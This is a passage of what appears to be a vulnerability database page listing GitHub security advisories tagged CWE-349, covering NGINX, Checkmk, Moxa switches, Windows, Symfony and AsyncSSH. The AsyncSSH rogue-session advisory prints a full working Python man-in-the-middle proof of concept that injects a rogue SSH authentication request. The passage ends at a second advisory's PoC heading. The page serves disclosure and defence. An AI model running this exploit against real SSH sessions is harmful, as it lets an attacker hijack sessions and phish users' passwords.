CWE-349
AllowedAcceptance of Extraneous Untrusted Data With Trusted Data
Abstraction: Base · Status: Draft
The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.
76 vulnerabilities reference this CWE, most recent first.
GHSA-7CHH-RV6Q-8PP3
Vulnerability from github – Published: 2026-02-04 15:30 – Updated: 2026-02-14 00:32A vulnerability exists in NGINX OSS and NGINX Plus when configured to proxy to upstream Transport Layer Security (TLS) servers. An attacker with a man-in-the-middle (MITM) position on the upstream server side—along with conditions beyond the attacker's control—may be able to inject plain text data into the response from an upstream proxied server. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
{
"affected": [],
"aliases": [
"CVE-2026-1642"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-349"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-04T15:16:14Z",
"severity": "HIGH"
},
"details": "A vulnerability exists in NGINX OSS and NGINX Plus when configured to proxy to upstream Transport Layer Security (TLS) servers. An attacker with a man-in-the-middle (MITM) position on the upstream server side\u2014along with conditions beyond the attacker\u0027s control\u2014may be able to inject plain text data into the response from an upstream proxied server.\u00a0\u00a0Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.",
"id": "GHSA-7chh-rv6q-8pp3",
"modified": "2026-02-14T00:32:41Z",
"published": "2026-02-04T15:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1642"
},
{
"type": "WEB",
"url": "https://my.f5.com/manage/s/article/K000159824"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/02/05/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-87VX-9472-JJMP
Vulnerability from github – Published: 2024-04-16 12:30 – Updated: 2024-04-16 12:30Argument injection in websphere_mq agent plugin in Checkmk 2.0.0, 2.1.0, <2.2.0p25 and <2.3.0b5 allows local attacker to inject one argument to runmqsc
{
"affected": [],
"aliases": [
"CVE-2024-3367"
],
"database_specific": {
"cwe_ids": [
"CWE-349",
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-16T12:15:10Z",
"severity": "MODERATE"
},
"details": "Argument injection in websphere_mq agent plugin in Checkmk 2.0.0, 2.1.0, \u003c2.2.0p25 and \u003c2.3.0b5 allows local attacker to inject one argument to runmqsc",
"id": "GHSA-87vx-9472-jjmp",
"modified": "2024-04-16T12:30:31Z",
"published": "2024-04-16T12:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3367"
},
{
"type": "WEB",
"url": "https://checkmk.com/werk/16615"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8FJ5-VVV3-Q47W
Vulnerability from github – Published: 2025-10-23 15:30 – Updated: 2025-10-23 15:30An acceptance of extraneous untrusted data with trusted data vulnerability has been identified in Moxa’s Ethernet switches, which allows attackers with administrative privileges to manipulate HTTP Host headers by injecting a specially crafted Host header into HTTP requests sent to an affected device’s web service. This vulnerability is classified as Host Header Injection, where invalid Host headers can manipulate to redirect users, forge links, or phishing attacks. There is no impact to the confidentiality, integrity, and availability of the affected device; no loss of confidentiality, integrity, and availability within any subsequent systems.
{
"affected": [],
"aliases": [
"CVE-2025-1680"
],
"database_specific": {
"cwe_ids": [
"CWE-349"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-23T14:15:35Z",
"severity": "LOW"
},
"details": "An acceptance of extraneous untrusted data with trusted data vulnerability has been identified in Moxa\u2019s Ethernet switches, which allows attackers with administrative privileges to manipulate HTTP Host headers by injecting a specially crafted Host header into HTTP requests sent to an affected device\u2019s web service. This vulnerability is classified as Host Header Injection, where invalid Host headers can manipulate to redirect users, forge links, or phishing attacks. There is no impact to the confidentiality, integrity, and availability of the affected device; no loss of confidentiality, integrity, and availability within any subsequent systems.",
"id": "GHSA-8fj5-vvv3-q47w",
"modified": "2025-10-23T15:30:34Z",
"published": "2025-10-23T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1680"
},
{
"type": "WEB",
"url": "https://www.hackrtu.com/blog/cg-technical-en-003"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-257421-cve-2025-1679,-cve-2025-1680-stored-cross-site-scripting-(xss)-and-host-header-injection-vulnerabilities-in"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-8H4W-Q329-J73W
Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-14 18:30Acceptance of extraneous untrusted data with trusted data in Windows COM allows an unauthorized attacker to elevate privileges locally.
{
"affected": [],
"aliases": [
"CVE-2026-32162"
],
"database_specific": {
"cwe_ids": [
"CWE-349"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-14T18:17:18Z",
"severity": "HIGH"
},
"details": "Acceptance of extraneous untrusted data with trusted data in Windows COM allows an unauthorized attacker to elevate privileges locally.",
"id": "GHSA-8h4w-q329-j73w",
"modified": "2026-04-14T18:30:41Z",
"published": "2026-04-14T18:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32162"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32162"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8RFR-J4C8-VW6C
Vulnerability from github – Published: 2024-07-30 09:32 – Updated: 2024-08-01 15:32Acceptance of extraneous untrusted data with trusted data vulnerability exists in EC-CUBE 4 series. If this vulnerability is exploited, an attacker who obtained the administrative privilege may install an arbitrary PHP package. If the obsolete versions of PHP packages are installed, the product may be affected by some known vulnerabilities.
{
"affected": [],
"aliases": [
"CVE-2024-41924"
],
"database_specific": {
"cwe_ids": [
"CWE-349"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-30T09:15:05Z",
"severity": "HIGH"
},
"details": "Acceptance of extraneous untrusted data with trusted data vulnerability exists in EC-CUBE 4 series. If this vulnerability is exploited, an attacker who obtained the administrative privilege may install an arbitrary PHP package. If the obsolete versions of PHP packages are installed, the product may be affected by some known vulnerabilities.",
"id": "GHSA-8rfr-j4c8-vw6c",
"modified": "2024-08-01T15:32:15Z",
"published": "2024-07-30T09:32:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41924"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN48324254"
},
{
"type": "WEB",
"url": "https://www.ec-cube.net/info/weakness/20240701/index.php"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8WGJ-6WX8-H5HQ
Vulnerability from github – Published: 2022-05-13 01:05 – Updated: 2024-02-08 19:31An issue was discovered in Http Foundation in Symfony 2.7.0 through 2.7.48, 2.8.0 through 2.8.43, 3.3.0 through 3.3.17, 3.4.0 through 3.4.13, 4.0.0 through 4.0.13, and 4.1.0 through 4.1.2. It arises from support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header. These headers are designed for IIS support, but it's not verified that the server is in fact running IIS, which means anybody who can send these requests to an application can trigger this. This affects \Symfony\Component\HttpFoundation\Request::prepareRequestUri() where X-Original-URL and X_REWRITE_URL are both used. The fix drops support for these methods so that they cannot be used as attack vectors such as web cache poisoning.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/http-foundation"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.49"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/http-foundation"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.44"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/http-foundation"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.3.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/http-foundation"
},
"ranges": [
{
"events": [
{
"introduced": "3.4.0"
},
{
"fixed": "3.4.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/http-foundation"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/http-foundation"
},
"ranges": [
{
"events": [
{
"introduced": "4.1.0"
},
{
"fixed": "4.1.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.49"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.44"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.3.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "3.4.0"
},
{
"fixed": "3.4.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "4.1.0"
},
{
"fixed": "4.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-14773"
],
"database_specific": {
"cwe_ids": [
"CWE-349"
],
"github_reviewed": true,
"github_reviewed_at": "2023-02-22T16:58:31Z",
"nvd_published_at": "2018-08-03T17:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Http Foundation in Symfony 2.7.0 through 2.7.48, 2.8.0 through 2.8.43, 3.3.0 through 3.3.17, 3.4.0 through 3.4.13, 4.0.0 through 4.0.13, and 4.1.0 through 4.1.2. It arises from support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header. These headers are designed for IIS support, but it\u0027s not verified that the server is in fact running IIS, which means anybody who can send these requests to an application can trigger this. This affects \\Symfony\\Component\\HttpFoundation\\Request::prepareRequestUri() where X-Original-URL and X_REWRITE_URL are both used. The fix drops support for these methods so that they cannot be used as attack vectors such as web cache poisoning.",
"id": "GHSA-8wgj-6wx8-h5hq",
"modified": "2024-02-08T19:31:49Z",
"published": "2022-05-13T01:05:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14773"
},
{
"type": "WEB",
"url": "https://github.com/symfony/symfony/commit/e447e8b92148ddb3d1956b96638600ec95e08f6b"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2018-14773.yaml"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-14773.yaml"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00009.html"
},
{
"type": "WEB",
"url": "https://seclists.org/bugtraq/2019/May/21"
},
{
"type": "WEB",
"url": "https://symfony.com/blog/cve-2018-14773-remove-support-for-legacy-and-risky-http-headers"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2019/dsa-4441"
},
{
"type": "WEB",
"url": "https://www.drupal.org/SA-CORE-2018-005"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/104943"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1041405"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Symfony HTTP Foundation web cache poisoning"
}
GHSA-9G25-JR9M-X4JH
Vulnerability from github – Published: 2026-06-09 18:30 – Updated: 2026-06-09 18:30No cwe for this issue in Windows DHCP Server allows an unauthorized attacker to perform tampering over a network.
{
"affected": [],
"aliases": [
"CVE-2026-45602"
],
"database_specific": {
"cwe_ids": [
"CWE-229",
"CWE-349"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-09T17:17:28Z",
"severity": "CRITICAL"
},
"details": "No cwe for this issue in Windows DHCP Server allows an unauthorized attacker to perform tampering over a network.",
"id": "GHSA-9g25-jr9m-x4jh",
"modified": "2026-06-09T18:30:52Z",
"published": "2026-06-09T18:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45602"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45602"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9R8M-73H4-4JCM
Vulnerability from github – Published: 2023-08-03 21:30 – Updated: 2024-04-04 06:32A local user could edit the VideoEdge configuration file and interfere with VideoEdge operation.
{
"affected": [],
"aliases": [
"CVE-2023-3749"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-349"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-03T20:15:11Z",
"severity": "MODERATE"
},
"details": "A local user could edit the VideoEdge configuration file and interfere with VideoEdge operation.",
"id": "GHSA-9r8m-73h4-4jcm",
"modified": "2024-04-04T06:32:22Z",
"published": "2023-08-03T21:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3749"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-215-04"
},
{
"type": "WEB",
"url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C35Q-FFPF-5QPM
Vulnerability from github – Published: 2023-11-09 18:35 – Updated: 2025-11-04 16:47Summary
An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.
Details
The rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.
The attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.
PoC
AsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example) ```python #!/usr/bin/python3 import socket from threading import Thread from binascii import unhexlify from time import sleep ################################################################################## ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ## ## ## ## Variant: Unmodified variant (EXT_INFO by client required) ## ## ## ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ## ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ## ## ## ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ## ################################################################################## # IP and port for the TCP proxy to bind to PROXY_IP = '127.0.0.1' PROXY_PORT = 2222 # IP and port of the server SERVER_IP = '127.0.0.1' SERVER_PORT = 22 # Length of the individual messages NEW_KEYS_LENGTH = 16 CLIENT_EXT_INFO_LENGTH = 60 # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO) ADDITIONAL_CLIENT_DATA_LENGTH = 60 newkeys_payload = b'\x00\x00\x00\x0c\x0a\x15' def contains_newkeys(data): return newkeys_payload in data rogue_userauth_request = unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000') def insert_rogue_authentication_request(data): newkeys_index = data.index(newkeys_payload) # Insert rogue authentication request and remove SSH_MSG_EXT_INFO return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:] def forward_client_to_server(client_socket, server_socket): delay_next = False try: while True: client_data = client_socket.recv(4096) if delay_next: delay_next = False sleep(0.25) if contains_newkeys(client_data): print("[+] SSH_MSG_NEWKEYS sent by client identified!") if len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH: print("[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!") while len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH: client_data += client_socket.recv(4096) print(f"[d] Original client_data before modification: {client_data.hex()}") client_data = insert_rogue_authentication_request(client_data) print(f"[d] Modified client_data with rogue authentication request: {client_data.hex()}") delay_next = True if len(client_data) == 0: break server_socket.send(client_data) except ConnectionResetError: print("[!] Client connection has been reset. Continue closing sockets.") print("[!] forward_client_to_server thread ran out of data, closing sockets!") client_socket.close() server_socket.close() def forward_server_to_client(client_socket, server_socket): try: while True: server_data = server_socket.recv(4096) if len(server_data) == 0: break client_socket.send(server_data) except ConnectionResetError: print("[!] Target connection has been reset. Continue closing sockets.") print("[!] forward_server_to_client thread ran out of data, closing sockets!") client_socket.close() server_socket.close() if __name__ == '__main__': print("--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---") mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.bind((PROXY_IP, PROXY_PORT)) mitm_socket.listen(5) print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...") try: while True: client_socket, client_addr = mitm_socket.accept() print(f"[+] Accepted connection from: {client_addr}") print(f"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.") server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((SERVER_IP, SERVER_PORT)) print("[+] Spawning new forwarding threads to handle client connection.") Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start() Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start() except KeyboardInterrupt: client_socket.close() server_socket.close() mitm_socket.close() ```Impact
The impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "asyncssh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.14.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46446"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-349",
"CWE-354",
"CWE-359",
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2023-11-09T18:35:14Z",
"nvd_published_at": "2023-11-14T03:15:09Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAn issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.\n\n### Details\n\nThe rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker\u0027s account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user\u0027s session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker\u0027s position to a MitM at the application layer and enabling perfect shell emulation.\n\nThe attacks work by the attacker injecting a chosen authentication request before the client\u0027s NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.\n\n### PoC\n\n\u003cdetails\u003e\n \u003csummary\u003eAsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example)\u003c/summary\u003e\n\n ```python\n #!/usr/bin/python3\n import socket\n from threading import Thread\n from binascii import unhexlify\n from time import sleep\n \n ##################################################################################\n ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ##\n ## ##\n ## Variant: Unmodified variant (EXT_INFO by client required) ##\n ## ##\n ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ##\n ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ##\n ## ##\n ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n ##################################################################################\n \n # IP and port for the TCP proxy to bind to\n PROXY_IP = \u0027127.0.0.1\u0027\n PROXY_PORT = 2222\n \n # IP and port of the server\n SERVER_IP = \u0027127.0.0.1\u0027\n SERVER_PORT = 22\n \n # Length of the individual messages\n NEW_KEYS_LENGTH = 16\n CLIENT_EXT_INFO_LENGTH = 60\n # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO)\n ADDITIONAL_CLIENT_DATA_LENGTH = 60\n \n newkeys_payload = b\u0027\\x00\\x00\\x00\\x0c\\x0a\\x15\u0027\n def contains_newkeys(data):\n return newkeys_payload in data\n \n rogue_userauth_request = unhexlify(\u0027000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000\u0027)\n def insert_rogue_authentication_request(data):\n newkeys_index = data.index(newkeys_payload)\n # Insert rogue authentication request and remove SSH_MSG_EXT_INFO\n return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:]\n \n def forward_client_to_server(client_socket, server_socket):\n delay_next = False\n try:\n while True:\n client_data = client_socket.recv(4096)\n if delay_next:\n delay_next = False\n sleep(0.25)\n if contains_newkeys(client_data):\n print(\"[+] SSH_MSG_NEWKEYS sent by client identified!\")\n if len(client_data) \u003c NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n print(\"[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!\")\n while len(client_data) \u003c NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n client_data += client_socket.recv(4096)\n print(f\"[d] Original client_data before modification: {client_data.hex()}\")\n client_data = insert_rogue_authentication_request(client_data)\n print(f\"[d] Modified client_data with rogue authentication request: {client_data.hex()}\")\n delay_next = True\n if len(client_data) == 0:\n break\n server_socket.send(client_data)\n except ConnectionResetError:\n print(\"[!] Client connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_client_to_server thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n def forward_server_to_client(client_socket, server_socket):\n try:\n while True:\n server_data = server_socket.recv(4096)\n if len(server_data) == 0:\n break\n client_socket.send(server_data)\n except ConnectionResetError:\n print(\"[!] Target connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_server_to_client thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n if __name__ == \u0027__main__\u0027:\n print(\"--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---\")\n mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mitm_socket.bind((PROXY_IP, PROXY_PORT))\n mitm_socket.listen(5)\n \n print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n \n try:\n while True:\n client_socket, client_addr = mitm_socket.accept()\n print(f\"[+] Accepted connection from: {client_addr}\")\n print(f\"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.\")\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"[+] Spawning new forwarding threads to handle client connection.\")\n Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()\n Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()\n except KeyboardInterrupt:\n client_socket.close()\n server_socket.close()\n mitm_socket.close()\n ```\n\u003c/details\u003e\n\n### Impact\n\nThe impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection\u0027s security.",
"id": "GHSA-c35q-ffpf-5qpm",
"modified": "2025-11-04T16:47:15Z",
"published": "2023-11-09T18:35:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/security/advisories/GHSA-c35q-ffpf-5qpm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46446"
},
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/commit/83e43f5ea3470a8617fc388c72b062c7136efd7e"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-c35q-ffpf-5qpm"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/asyncssh/PYSEC-2023-239.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/ronf/asyncssh"
},
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00042.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ME34ROZWMDK5KLMZKTSA422XVJZ7IMTE"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20231222-0001"
},
{
"type": "WEB",
"url": "https://www.terrapin-attack.com"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AsyncSSH Rogue Session Attack"
}
GHSA-CFC2-WR2V-GXM5
Vulnerability from github – Published: 2023-11-09 18:34 – Updated: 2025-11-04 16:46Summary
An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack.
Details
The rogue extension negotiation attack targets an AsyncSSH client connecting to any SSH server sending an extension info message. The attack exploits an implementation flaw in the AsyncSSH implementation to inject an extension info message chosen by the attacker and delete the original extension info message, effectively replacing it.
A correct SSH implementation should not process an unauthenticated extension info message. However, the injected message is accepted due to flaws in AsyncSSH. AsyncSSH supports the server-sig-algs and global-requests-ok extensions. Hence, the attacker can downgrade the algorithm used for client authentication by meddling with the value of server-sig-algs (e.g. use of SHA-1 instead of SHA-2).
PoC
